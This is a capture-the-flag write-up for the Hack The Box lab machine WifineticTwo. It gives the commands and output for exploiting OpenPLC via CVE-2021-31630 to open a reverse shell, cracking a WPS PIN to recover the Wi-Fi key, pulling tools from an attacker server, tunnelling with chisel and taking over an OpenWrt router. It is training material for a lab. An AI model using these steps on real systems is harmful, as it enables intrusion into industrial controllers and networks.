Table of contents
Open Table of contents
INFO
CTF URL: https://app.hackthebox.com/machines/WifineticTwo
IP: 10.10.11.7
Difficulty: Medium
Reconaisance
NMAP
nmap -p- 10.10.11.7 -v --min-rate 10000
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
nmap -p22,8080 -sS -sC -sV 10.10.11.7 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
| http-title: Site doesnt have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqEziQ.wmxVSOxwnjs3ZtAXf2Vq_ftaz0U; Expires=Wed, 24-Jul-2024 17:07:01 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 24 Jul 2024 17:02:01 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZqEzhQ.qaGXsfQfAQlqoN1VIeqiTRO5Fcg; Expires=Wed, 24-Jul-2024 17:06:57 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 24 Jul 2024 17:01:57 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqEzhg.6RcKQsx22Sio95_sfLB_PzY4D3Q; Expires=Wed, 24-Jul-2024 17:06:58 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Wed, 24 Jul 2024 17:01:58 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
WEB - 8080
- OpenPLC Webserver
openplc:openplccredentials worked!
Openplc
exploit
git clone https://github.com/mind2hex/CVE-2021-31630
cd CVE-2021-31630
python3 exploit.py --ip 10.10.14.43 --port 1234 -U openplc -P openplc --target http://10.10.11.7:8080/
=======================
[1] Target: http://10.10.11.7:8080/
[2] Credentials: openplc:openplc
[3] Addr for rev shell: 10.10.14.43:1234
=======================
[!] Trying to log in with credentials openplc:openplc
[!] Successful login
[!] Session Cookie: session=.eJw9jzFvgzAUhP9K5bkDEFiQOiCZWAzvWUFG1vMStYkbYjBFJFGoo_z3uh063HS6--4ebP-52EvPyutys69sfz6y8sFePljJSKGXus5BmBHCdiDdpSC6zOi2B7FbgXcBQ5Wggw0qyKVoz6QpgG6SmBkonFYpmgJ4lSHvMvLoybU9CkjIocNwSJGPXqp-MHxIScFd6t2vMuOaAnmVx-575Gyitxq-jVxYUVCB6lQYVX9LVaeR_caecftsF_8-2en6_-Z2scvfJfY122keD-z5Awe5TyA.ZqE1uQ.2m0NL2rjLAJs1jIgyJTvIu6nfDw
[!] Sending payload to: http://10.10.11.7:8080//upload-program
[!] Sending payload to: http://10.10.11.7:8080//hardware
[!] Program compilation in curse. http://10.10.11.7:8080/compile-program?file=151903.st
[!] Program compiled successfully...
[!] Starting plc. Check your listener...
got the shell
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.11.7] 48652
whoami
root
shell stabilization
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg
user.txt
cd
cat user.txt
f29b9e1c659db3628f2718117c55bc7e
Wireless
ENUM
As name suggests, it may mean that we need to exploit Wirelessly.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.4 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fe79:d1d2 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:79:d1:d2 txqueuelen 1000 (Ethernet)
RX packets 197806 bytes 16958107 (16.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 145191 bytes 15152251 (15.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10 bytes 576 (576.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10 bytes 576 (576.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:04:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0 - an interface for Wireless Network.
In order to scan available networks for attack:
init wpa_supplicant
vim /etc/wpa_supplicant/wpa_supplicant.conf
# add
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
start
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
get into interactive mode of wpa_cli
wpa_cli
> scan
# after some time
> scan_results
bssid / frequency / signal level / flags / ssid
02:00:00:00:01:00 2412 -30 [WPA2-PSK-CCMP][WPS][ESS] plcrouter
There is a WiFi with WPS enabled!
Note: if there are some errors with wpa_cli or wpa_supplicant, you may need to stop wpa_supplicant service, and start the steps again.
WPS Attack
switch the interface to monitor mode
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
reaver (not working)
Now lets attack, but first we need to transfer tools onto victim machine. I did it in the following way:
# copy binary to a location
cp /usr/bin/reaver .
cp /usr/lib/x86_64-linux-gnu/libpcap.so.0.8 . # reaver needs it
# setup a python server
python3 -m http.server
# transfer onto victim
curl http://10.10.14.43:8000/reaver > reaver
curl http://10.10.14.43:8000/libpcap.so.0.8 > /usr/lib/x86_64-linux-gnu/libpcap.so.0.8
chmod +x reaver
then attack
./reaver --bssid 02:00:00:00:01:00 --interface wlan0 -v --no-associate
Idk why, but it does not work in this machine. :(
bully (not working)
# copy binary to a location
cp /usr/bin/bully .
cp /usr/lib/x86_64-linux-gnu/liblua5.3.so.0 .
# setup a python server
python3 -m http.server
# transfer onto victim
curl http://10.10.14.43:8000/bully > bully
curl http://10.10.14.43:8000/liblua5.3.so.0 > /usr/lib/x86_64-linux-gnu/liblua5.3.so.0
then attack
./bully -b 02:00:00:00:01:00 wlan0
Idk why, but it does not work in this machine, either. :(((
oneshot
# transfer by copying python code, and then attack
python3 oneshot.py -i wlan0 --bssid 02:00:00:00:01:00
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'
Connect to the WiFi
vim /etc/wpa_supplicant/wpa_supplicant.conf
# add
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
}
(stop and then) start wpa_supplicant
pkill wpa_supplicant
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
# get ip
# dhclient wlan0 - it will not work, you cannot then connect to the machine
ifconfig wlan0 192.168.1.150 netmask 255.255.255.0 up
Scanning the Network
for ip in 192.168.1.{1..255}; do
(
ping -c 1 -W 1 $ip > /dev/null
if [ $? -eq 0 ]; then
echo "${ip} is up"
fi
) &
done
wait
The result:
192.168.1.1 is up
192.168.1.150 is up
Let’s scan ports with:
./spookyscan.sh -i 192.168.1.1 -p 1024
# result
192.168.1.1:22 is open
192.168.1.1:53 is open
192.168.1.1:80 is open
192.168.1.1:443 is open
I need to forward them to the attack machine.
Port Forwarding
I gonna use chisel.
# download it both on victim and attack machine
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
# on attack machine
## config is the following
cat /etc/proxychains4.conf
...
socks5 127.0.0.1 1080
# then run this
./chisel_1.9.1_linux_amd64 server -p 2200 --reverse
# on victim machine
./chisel_1.9.1_linux_amd64 client 10.10.14.44:2200 R:socks
Check the connection:
proxychains4 curl http://192.168.1.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.1.1:80 ... OK
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
<style type="text/css">
body { background: white; font-family: arial, helvetica, sans-serif; }
a { color: black; }
@media (prefers-color-scheme: dark) {
body { background: black; }
a { color: white; }
}
</style>
</head>
<body>
<a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
</body>
</html>
It means everything is ok
Attacking the router
Web
Ports: 80 and 443 To open the page in firefox
proxychains4 firefox
it opens an interface of the router: ap LuCI
http://192.168.1.1/cgi-bin/luci/- No password set
SSH Login and root.txt
I checked settings of the router and found the following:
http://192.168.1.1/cgi-bin/luci/admin/system/admin/password
Added a password for root and ssh-ed to the system:
root@attica04:~# ssh [email protected]
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.
[email protected]'s password:
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
root@ap:~# ls
root.txt
root@ap:~# cat root.txt
aff8e5810c3c00f297d342c819e39ee6